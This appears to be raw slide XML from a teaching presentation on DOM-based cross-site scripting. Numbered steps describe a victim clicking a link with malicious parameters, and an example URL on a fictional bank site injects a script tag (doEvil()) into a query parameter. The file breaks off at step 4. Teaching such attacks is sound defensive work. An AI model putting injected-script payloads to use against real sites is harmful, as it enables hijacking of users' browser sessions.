              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Click</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643544" y="333396"/>
            <a:ext cx="4902200" cy="920830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DOM-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-127" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948466" y="2289212"/>
            <a:ext cx="5058833" cy="1014807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="662923" marR="2086981"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safebank.com/welcome.php?query=&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367131" y="4396783"/>
            <a:ext cx="2479885" cy="1191259"/>
            <a:chOff x="275348" y="3297587"/>
            <a:chExt cx="1859914" cy="893444"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275348" y="3297587"/>
              <a:ext cx="683679" cy="683672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="936193" y="3342475"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>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2" name="object 22"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="897636" y="3459480"/>
              <a:ext cx="1237487" cy="731519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482556"/>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24" name="object 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482556"/>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25" name="object 25"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1053081" y="3707878"/>
              <a:ext cx="964691" cy="169163"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>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27" name="object 27"/>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28" name="object 28"/>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3" name="object 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4" name="object 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5" name="object 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8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8343730" y="2741609"/>
            <a:ext cx="3734647" cy="1125094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="191342" marR="6773" indent="-175256">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>uses </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>params </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>fashion,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ignores</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="850032"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>param</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643544" y="333396"/>
            <a:ext cx="4902200" cy="920830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DOM-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-127" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3009053" y="3877901"/>
            <a:ext cx="7378700" cy="1542627"/>
            <a:chOff x="2256789" y="2908426"/>
            <a:chExt cx="5534025" cy="1156970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6911421" y="2908426"/>
              <a:ext cx="879266" cy="1156931"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2275839" y="3509035"/>
              <a:ext cx="4620895" cy="6350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4620895" h="6350">
                  <a:moveTo>
                    <a:pt x="0" y="6324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4620641" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6782084" y="3442525"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114934" h="133350">
                  <a:moveTo>
                    <a:pt x="190" y="133350"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114401" y="66509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1932066" y="1440405"/>
            <a:ext cx="1998980" cy="2860887"/>
            <a:chOff x="1449049" y="1080303"/>
            <a:chExt cx="1499235" cy="2145665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>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6" name="object 16"/>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7" name="object 17"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2211882" y="1080303"/>
              <a:ext cx="736066" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948466" y="2289212"/>
            <a:ext cx="5058833" cy="1014807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="662923" marR="2086981"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safebank.com/welcome.php?query=&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367131" y="4396783"/>
            <a:ext cx="2479885" cy="1191259"/>
            <a:chOff x="275348" y="3297587"/>
            <a:chExt cx="1859914" cy="893444"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275348" y="3297587"/>
              <a:ext cx="683679" cy="683672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="936193" y="3342475"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="929982" y="333681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3" name="object 23"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="897636" y="3459480"/>
              <a:ext cx="1237487" cy="731519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482556"/>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050505"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482556"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="object 26"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1053081" y="3707878"/>
              <a:ext cx="964691" cy="169163"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3583284" y="411795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sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631616" y="5280341"/>
            <a:ext cx="390313" cy="193964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="1533"/>
              </a:lnSpc>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sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8748479" y="5494155"/>
            <a:ext cx="2237740" cy="312073"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>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30" name="object 30"/>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3" name="object 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4" name="object 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5" name="object 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8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8748505" y="5418056"/>
            <a:ext cx="2237740" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3032254" y="5195268"/>
            <a:ext cx="6123093" cy="228600"/>
            <a:chOff x="2274190" y="3896451"/>
            <a:chExt cx="4592320" cy="171450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2293242" y="3966512"/>
              <a:ext cx="4554220" cy="16510"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4554220" h="16510">
                  <a:moveTo>
                    <a:pt x="4554016" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="16078"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2293240" y="3915501"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114935" h="133350">
                  <a:moveTo>
                    <a:pt x="114058" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="67081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114541" y="133350"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3709245" y="5254956"/>
            <a:ext cx="1651847" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
